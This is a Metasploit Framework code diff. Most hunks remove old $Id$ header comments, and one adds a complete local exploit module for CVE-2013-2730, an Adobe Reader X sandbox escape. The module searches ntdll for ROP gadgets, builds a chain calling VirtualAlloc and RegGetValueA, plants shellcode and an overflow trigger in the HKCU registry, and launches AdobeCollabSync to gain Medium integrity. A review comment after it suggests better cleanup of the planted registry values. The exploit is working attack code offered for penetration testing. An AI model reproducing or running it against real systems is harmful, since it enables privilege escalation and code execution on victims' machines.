a/lib/rex/proto/rfb.rb.ut.rb b/lib/rex/proto/rfb.rb.ut.rb index d06de6c4d2..cb9900de64 100644 --- a/lib/rex/proto/rfb.rb.ut.rb +++ b/lib/rex/proto/rfb.rb.ut.rb 
@@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- # -# $Id: $ -# # RFB protocol support # # @author Joshua J. Drake diff --git a/lib/rex/proto/rfb/cipher.rb b/lib/rex/proto/rfb/cipher.rb index 7a0c37dbdb..ca54d19a2e 100644 --- a/lib/rex/proto/rfb/cipher.rb +++ b/lib/rex/proto/rfb/cipher.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id: $ -## ## # diff --git a/lib/rex/proto/rfb/client.rb b/lib/rex/proto/rfb/client.rb index 723a067034..fd75160953 100644 --- a/lib/rex/proto/rfb/client.rb +++ b/lib/rex/proto/rfb/client.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id: $ -## ## # diff --git a/lib/rex/proto/rfb/constants.rb b/lib/rex/proto/rfb/constants.rb index fc5517d8a3..868b6533f1 100644 --- a/lib/rex/proto/rfb/constants.rb +++ b/lib/rex/proto/rfb/constants.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id: $ -## ## # diff --git a/lib/rex/proto/tftp.rb b/lib/rex/proto/tftp.rb index 2ed08237e4..22e93f8bf7 100644 --- a/lib/rex/proto/tftp.rb +++ b/lib/rex/proto/tftp.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ # # TFTP Server implementation according to: # diff --git a/lib/rex/proto/tftp/constants.rb b/lib/rex/proto/tftp/constants.rb index d29894c8bf..476000afe4 100644 --- a/lib/rex/proto/tftp/constants.rb +++ b/lib/rex/proto/tftp/constants.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/proto/tftp' module Rex diff --git a/lib/rex/proto/tftp/server.rb b/lib/rex/proto/tftp/server.rb index c01d18f9a9..7c9e3bee3a 100644 --- a/lib/rex/proto/tftp/server.rb +++ b/lib/rex/proto/tftp/server.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/socket' require 'rex/proto/tftp' diff --git a/lib/rex/proto/tftp/server.rb.ut.rb b/lib/rex/proto/tftp/server.rb.ut.rb index b767e0c2e4..32a0647518 100755 --- a/lib/rex/proto/tftp/server.rb.ut.rb +++ b/lib/rex/proto/tftp/server.rb.ut.rb @@ -1,10 +1,5 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# -# $Revision$ -# -# $Id$ -# require 'rex/compat' require 'rex/proto/tftp' 
diff --git a/lib/rex/zip/archive.rb b/lib/rex/zip/archive.rb index 0c69769aee..b8b068f75f 100644 --- a/lib/rex/zip/archive.rb +++ b/lib/rex/zip/archive.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Rex module Zip diff --git a/lib/rex/zip/blocks.rb b/lib/rex/zip/blocks.rb index 6774e73869..d589b99318 100644 --- a/lib/rex/zip/blocks.rb +++ b/lib/rex/zip/blocks.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Rex module Zip diff --git a/lib/rex/zip/entry.rb b/lib/rex/zip/entry.rb index ff41196550..b063b6a72e 100644 --- a/lib/rex/zip/entry.rb +++ b/lib/rex/zip/entry.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Rex module Zip diff --git a/modules/auxiliary/server/capture/drda.rb b/modules/auxiliary/server/capture/drda.rb index 2072b8545b..f77fe8c5af 100644 --- a/modules/auxiliary/server/capture/drda.rb +++ b/modules/auxiliary/server/capture/drda.rb @@ -1,6 +1,4 @@ -## -# $Id: drda.rb 14774 2012-02-21 01:42:17Z rapid7 $ -## +# -*- coding: binary -*- ## # This file is part of the Metasploit Framework and may be subject to diff --git a/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb b/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb index b3c33e892f..f98eed8595 100644 --- a/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb +++ b/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb @@ -1,6 +1,4 @@ -## -# $Id: $ -## +# -*- coding: binary -*- ## # This file is part of the Metasploit Framework and may be subject to diff --git a/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb b/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb index 11b5d57c76..6900ed129a 100644 --- a/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb +++ b/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb @@ -1,6 +1,4 @@ -## -# $Id: $ -## +# -*- coding: binary -*- ## # This file is part of the Metasploit Framework and may be subject to 
diff --git a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb index 422b8f8392..ae8b61a428 100644 --- a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb +++ b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb @@ -1,6 +1,4 @@ -## -# $Id: jboss_deploymentfilerepository.rb 15620 2012-07-12 07:33:06Z rapid7 $ -## +# -*- coding: binary -*- ## # This file is part of the Metasploit Framework and may be subject to diff --git a/modules/exploits/windows/browser/novelliprint_getdriversettings.rb b/modules/exploits/windows/browser/novelliprint_getdriversettings.rb index bec17f874b..ea8fcce859 100644 --- a/modules/exploits/windows/browser/novelliprint_getdriversettings.rb +++ b/modules/exploits/windows/browser/novelliprint_getdriversettings.rb @@ -1,6 +1,4 @@ -## -# $Id: novelliprint_getdriversettings.rb$ -## +# -*- coding: binary -*- ### # This file is part of the Metasploit Framework and may be subject to diff --git a/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb b/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb new file mode 100644 index 0000000000..50a7c3ad46 --- /dev/null +++ b/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb 
@@ -0,0 +1,359 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' +require 'msf/core/post/windows/registry' +require 'msf/core/post/common' +require 'msf/core/post/file' + +class Metasploit3 < Msf::Exploit::Local + Rank = GreatRanking + + include Msf::Exploit::EXE + include Msf::Post::Common + include Msf::Post::File + include Msf::Post::Windows::Registry + + def initialize(info={}) + super(update_info(info, { + 'Name' => 'AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass', + 'Description' => %q{ + This module exploits a vulnerability on Adobe Reader X Sandbox. The + vulnerability is due to a sandbox rule allowing a Low Integrity AcroRd32.exe + process to write register values which can be used to trigger a buffer overflow on + the AdobeCollabSync component, allowing to achieve Medium Integrity Level + privileges from a Low Integrity AcroRd32.exe process. This module has been tested + successfully on Adobe Reader X 10.1.4 over Windows 7 SP1. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Felipe Andres Manzano', # Vulnerability discovery and PoC + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2013-2730' ], + [ 'OSVDB', '93355' ], + [ 'URL', 'http://blog.binamuse.com/2013/05/adobe-reader-x-collab-sandbox-bypass.html' ] + ], + 'Arch' => ARCH_X86, + 'Platform' => 'win', + 'SessionTypes' => 'meterpreter', + 'Payload' => + { + 'Space' => 12288, + 'DisableNops' => true + }, + 'Targets' => + [ + [ 'Adobe Reader X 10.1.4 / Windows 7 SP1', + { + 'AdobeCollabSyncTrigger' => 0x18fa0, + 'AdobeCollabSyncTriggerSignature' => "\x56\x68\xBC\x00\x00\x00\xE8\xF5\xFD\xFF\xFF" + } + ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate'=> 'May 14 2013' + })) + + end + + def on_new_session + print_status("Deleting Malicious Registry Keys...") + if not registry_deletekey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode") + print_error("Delete HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode by yourself") + end + if not registry_deletekey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB") + print_error("Delete HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB by yourself") + end + print_status("Cleanup finished") + end + + # Test the process integrity level by trying to create a directory on the TEMP folder + # Access should be granted with Medium Integrity Level + # Access should be denied with Low Integrity Level + # Usint this solution atm because I'm experiencing problems with railgun when trying + # use GetTokenInformation + def low_integrity_level? 
+ tmp_dir = expand_path("%TEMP%") + cd(tmp_dir) + new_dir = "#{rand_text_alpha(5)}" + begin + session.shell_command_token("mkdir #{new_dir}") + rescue + return true + end + + if directory?(new_dir) + session.shell_command_token("rmdir #{new_dir}") + return false + else + return true + end + end + + def check_trigger + signature = session.railgun.memread(@addresses['AcroRd32.exe'] + target['AdobeCollabSyncTrigger'], target['AdobeCollabSyncTriggerSignature'].length) + if signature == target['AdobeCollabSyncTriggerSignature'] + return true + end + return false + end + + def collect_addresses + # find the trigger to launch AdobeCollabSyncTrigger.exe from AcroRd32.exe + @addresses['trigger'] = @addresses['AcroRd32.exe'] + target['AdobeCollabSyncTrigger'] + vprint_good("AdobeCollabSyncTrigger trigger address found at 0x#{@addresses['trigger'].to_s(16)}") + + # find kernel32.dll + kernel32 = session.railgun.kernel32.GetModuleHandleA("kernel32.dll") + @addresses['kernel32.dll'] = kernel32["return"] + if @addresses['kernel32.dll'] == 0 + fail_with(Exploit::Failure::Unknown, "Unable to find kernel32.dll") + end + vprint_good("kernel32.dll address found at 0x#{@addresses['kernel32.dll'].to_s(16)}") + + # find kernel32.dll methods + virtual_alloc = session.railgun.kernel32.GetProcAddress(@addresses['kernel32.dll'], "VirtualAlloc") + @addresses['VirtualAlloc'] = virtual_alloc["return"] + if @addresses['VirtualAlloc'] == 0 + fail_with(Exploit::Failure::Unknown, "Unable to find VirtualAlloc") + end + vprint_good("VirtualAlloc address found at 0x#{@addresses['VirtualAlloc'].to_s(16)}") + + reg_get_value = session.railgun.kernel32.GetProcAddress(@addresses['kernel32.dll'], "RegGetValueA") + @addresses['RegGetValueA'] = reg_get_value["return"] + if @addresses['RegGetValueA'] == 0 + fail_with(Exploit::Failure::Unknown, "Unable to find RegGetValueA") + end + vprint_good("RegGetValueA address found at 0x#{@addresses['RegGetValueA'].to_s(16)}") + + # find ntdll.dll + ntdll = 
session.railgun.kernel32.GetModuleHandleA("ntdll.dll") + @addresses['ntdll.dll'] = ntdll["return"] + if @addresses['ntdll.dll'] == 0 + fail_with(Exploit::Failure::Unknown, "Unable to find ntdll.dll") + end + vprint_good("ntdll.dll address found at 0x#{@addresses['ntdll.dll'].to_s(16)}") + end + + # Search a gadget identified by pattern on the process memory + def search_gadget(base, offset_start, offset_end, pattern) + mem = base + offset_start + length = offset_end - offset_start + mem_contents = session.railgun.memread(mem, length) + return mem_contents.index(pattern) + end + + # Search for gadgets on ntdll.dll + def search_gadgets + ntdll_text_base = 0x10000 + search_length = 0xd6000 + + @gadgets['mov [edi], ecx # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x89\x0f\xc3") + if @gadgets['mov [edi], ecx # ret'].nil? + fail_with(Exploit::Failure::Unknown, "Unable to find gadget 'mov [edi], ecx # ret'") + end + @gadgets['mov [edi], ecx # ret'] += @addresses['ntdll.dll'] + @gadgets['mov [edi], ecx # ret'] += ntdll_text_base + vprint_good("Gadget 'mov [edi], ecx # ret' found at 0x#{@gadgets['mov [edi], ecx # ret'].to_s(16)}") + + @gadgets['ret'] = @gadgets['mov [edi], ecx # ret'] + 2 + vprint_good("Gadget 'ret' found at 0x#{@gadgets['ret'].to_s(16)}") + + @gadgets['pop edi # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x5f\xc3") + if @gadgets['pop edi # ret'].nil? + fail_with(Exploit::Failure::Unknown, "Unable to find gadget 'pop edi # ret'") + end + @gadgets['pop edi # ret'] += @addresses['ntdll.dll'] + @gadgets['pop edi # ret'] += ntdll_text_base + vprint_good("Gadget 'pop edi # ret' found at 0x#{@gadgets['pop edi # ret'].to_s(16)}") + + @gadgets['pop ecx # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x59\xc3") + if @gadgets['pop ecx # ret'].nil? 
+ fail_with(Exploit::Failure::Unknown, "Unable to find gadget 'pop ecx # ret'") + end + @gadgets['pop ecx # ret'] += @addresses['ntdll.dll'] + @gadgets['pop ecx # ret'] += ntdll_text_base + vprint_good("Gadget 'pop edi # ret' found at 0x#{@gadgets['pop ecx # ret'].to_s(16)}") + end + + def store(buf, data, address) + i = 0 + while (i < data.length) + buf << [@gadgets['pop edi # ret']].pack("V") + buf << [address + i].pack("V") # edi + buf << [@gadgets['pop ecx # ret']].pack("V") + buf << data[i, 4].ljust(4,"\x00") # ecx + buf << [@gadgets['mov [edi], ecx # ret']].pack("V") + i = i + 4 + end + return i + end + + def create_rop_chain + mem = 0x0c0c0c0c + + buf = [0x58000000 + 1].pack("V") + buf << [0x58000000 + 2].pack("V") + buf << [0].pack("V") + buf << [0x58000000 + 4].pack("V") + + buf << [0x58000000 + 5].pack("V") + buf << [0x58000000 + 6].pack("V") + buf << [0x58000000 + 7].pack("V") + buf << [@gadgets['ret']].pack("V") + buf << rand_text(8) + + # Allocate Memory To store the shellcode and the necessary data to read the + # shellcode stored in the registry + buf << [@addresses['VirtualAlloc']].pack("V") + buf << [@gadgets['ret']].pack("V") + buf << [mem].pack("V") # lpAddress + buf << [0x00010000].pack("V") # SIZE_T dwSize + buf << [0x00003000].pack("V") # DWORD flAllocationType + buf << [0x00000040].pack("V") # flProtect + + # Put in the allocated memory the necessary data in order to read the + # shellcode stored in the registry + # 1) The reg sub key: Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions + reg_key = "Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\x00" + reg_key_length = store(buf, reg_key, mem) + # 2) The reg entry: shellcode + value_key = "shellcode\x00" + store(buf, value_key, mem + reg_key_length) + # 3) The output buffer size: 0x3000 + size_buffer = 0x3000 + buf << [@gadgets['pop edi # ret']].pack("V") + buf << [mem + 0x50].pack("V") # edi + buf << [@gadgets['pop ecx # ret']].pack("V") + buf << 
[size_buffer].pack("V") # ecx + buf << [@gadgets['mov [edi], ecx # ret']].pack("V") + + # Copy the shellcode from the the registry to the + # memory allocated with executable permissions and + # ret into there + buf << [@addresses['RegGetValueA']].pack("V") + buf << [mem + 0x1000].pack("V") # ret to shellcode + buf << [0x80000001].pack("V") # hkey => HKEY_CURRENT_USER + buf << [mem].pack("V") # lpSubKey + buf << [mem + 0x3c].pack("V") # lpValue + buf << [0x0000FFFF].pack("V") # dwFlags => RRF_RT_ANY + buf << [0].pack("V") # pdwType + buf << [mem + 0x1000].pack("V") # pvData + buf << [mem + 0x50].pack("V") # pcbData + end + + # Store shellcode and AdobeCollabSync.exe Overflow trigger in the Registry + def store_data_registry(buf) + vprint_status("Creating the Registry Key to store the shellcode...") + + if registry_createkey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode") + vprint_good("Registry Key created") + else + fail_with(Exploit::Failure::Unknown, "Failed to create the Registry Key to store the shellcode") + end + + vprint_status("Storing the shellcode in the Registry...") + + if registry_setvaldata("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions", "shellcode", payload.encoded, "REG_BINARY") + vprint_good("Shellcode stored") + else + fail_with(Exploit::Failure::Unknown, "Failed to store shellcode in the Registry") + end + + # Create the Malicious registry entry in order to exploit.... 
+ vprint_status("Creating the Registry Key to trigger the Overflow...") + if registry_createkey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB") + vprint_good("Registry Key created") + else + fail_with(Exploit::Failure::Unknown, "Failed to create the Registry Entry to trigger the Overflow") + end + + vprint_status("Storing the trigger in the Registry...") + if registry_setvaldata("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions", "bDeleteDB", buf, "REG_BINARY") + vprint_good("Trigger stored") + else + fail_with(Exploit::Failure::Unknown, "Failed to store the trigger in the Registry") + end + end + + def trigger_overflow + vprint_status("Creating the thread to trigger the Overflow on AdobeCollabSync.exe...") + # Create a thread in order to execute the necessary code to launch AdobeCollabSync + ret = session.railgun.kernel32.CreateThread(nil, 0, @addresses['trigger'], nil, "CREATE_SUSPENDED", nil) + if ret['return'] < 1 + print_error("Unable to CreateThread") + return + end + hthread = ret['return'] + + vprint_status("Resuming the Thread...") + # Resume the thread to actually Launch AdobeCollabSync and trigger the vulnerability! 
+ ret = client.railgun.kernel32.ResumeThread(hthread) + if ret['return'] < 1 + fail_with(Exploit::Failure::Unknown, "Unable to ResumeThread") + end + end + + def check + @addresses = {} + acrord32 = session.railgun.kernel32.GetModuleHandleA("AcroRd32.exe") + @addresses['AcroRd32.exe'] = acrord32["return"] + if @addresses['AcroRd32.exe'] == 0 + return Msf::Exploit::CheckCode::Unknown + elsif check_trigger + return Msf::Exploit::CheckCode::Vulnerable + else + return Msf::Exploit::CheckCode::Detected + end + end + + def exploit + @addresses = {} + @gadgets = {} + + print_status("Verifying we're in the correct target process...") + acrord32 = session.railgun.kernel32.GetModuleHandleA("AcroRd32.exe") + @addresses['AcroRd32.exe'] = acrord32["return"] + if @addresses['AcroRd32.exe'] == 0 + fail_with(Exploit::Failure::NoTarget, "AcroRd32.exe process not found") + end + vprint_good("AcroRd32.exe found at 0x#{@addresses['AcroRd32.exe'].to_s(16)}") + + print_status("Checking the AcroRd32.exe image...") + if not check_trigger + fail_with(Exploit::Failure::NoTarget, "Please check the target, the AcroRd32.exe process doesn't match with the target") + end + + print_status("Checking the Process Integrity Level...") + if not low_integrity_level? + fail_with(Exploit::Failure::NoTarget, "Looks like you don't need this Exploit since you're already enjoying Medium Level") + end + + print_status("Collecting necessary addresses for exploit...") + collect_addresses + + print_status("Searching the gadgets needed to build the ROP chain...") + search_gadgets + print_good("Gadgets collected...") + + print_status("Building the ROP chain...") + buf = create_rop_chain + print_good("ROP chain ready...") + + print_status("Storing the shellcode and the trigger in the Registry...") + store_data_registry(buf) + + print_status("Executing AdobeCollabSync.exe...") + trigger_overflow + end +end + 
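Review bot: `on_new_session` removes the two subkeys the module created but leaves the actual data behind: `store_data_registry` writes the encoded payload as a REG_BINARY value named `shellcode` and the ROP trigger as a value named `bDeleteDB` directly under `HKCU\Software\Adobe\Adobe Synchronizer\10.0\DBRecoveryOptions` via `registry_setvaldata`, while cleanup only calls `registry_deletekey` on the empty `...\DBRecoveryOptions\shellcode` and `...\DBRecoveryOptions\bDeleteDB` subkeys. The payload and the overflow trigger therefore persist in the target's registry after a successful run, and the lingering `bDeleteDB` value presumably re-fires the overflow on the next AdobeCollabSync launch. Add `registry_deletevaldata("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions", "shellcode")` and `registry_deletevaldata("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions", "bDeleteDB")` next to the key deletions, and consider moving the removal into a `cleanup` override so it also runs when the exploit fails after the registry writes but before a session arrives. Relatedly, `trigger_overflow`'s CreateThread failure path only does `print_error` and `return`, so the exploit silently ends without a `fail_with`, unlike the ResumeThread branch directly below it.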
diff --git a/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb b/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb
index e0715c8038..f91f26f1e1 100644
--- a/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb
+++ b/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb
@@ -1,6 +1,4 @@
-##
-# $Id: $
-##
+# -*- coding: binary -*-
 ##
 # This file is part of the Metasploit Framework and may be subject to
diff --git a/modules/post/windows/gather/credentials/imvu.rb b/modules/post/windows/gather/credentials/imvu.rb
index 745e30410b..2129a721a6 100644
--- a/modules/post/windows/gather/credentials/imvu.rb
+++ b/modules/post/windows/gather/credentials/imvu.rb
@@ -1,6 +1,4 @@
-##
-# $Id: enum_imvu.rb 14100 2011-10-28 18:00:10Z theLightCosine $
-##
+# -*- coding: binary -*-
 ##
 # This file is part of the Metasploit Framework and may be subject to
diff --git a/modules/post/windows/gather/credentials/outlook.rb b/modules/post/windows/gather/credentials/outlook.rb
index f9bf10b3e3..38c25e3895 100644
--- a/modules/post/windows/gather/credentials/outlook.rb
+++ b/modules/post/windows/gather/credentials/outlook.rb
@@ -1,4 +1,4 @@
-# $Id: outlook.rb 14835 2012-03-01 22:15:05Z rapid7 $
+# -*- coding: binary -*-
 ##
 # This file is part of the Metasploit Framework and may be subject to
diff --git a/modules/post/windows/recon/resolve_ip.rb b/modules/post/windows/recon/resolve_ip.rb
index f4e761de39..36722018f0 100644
--- a/modules/post/windows/recon/resolve_ip.rb
+++ b/modules/post/windows/recon/resolve_ip.rb
@@ -1,6 +1,4 @@
-##
-# $Id $
-##
+# -*- coding: binary -*-
 ##
 # This file is part of the Metasploit Framework and may be subject to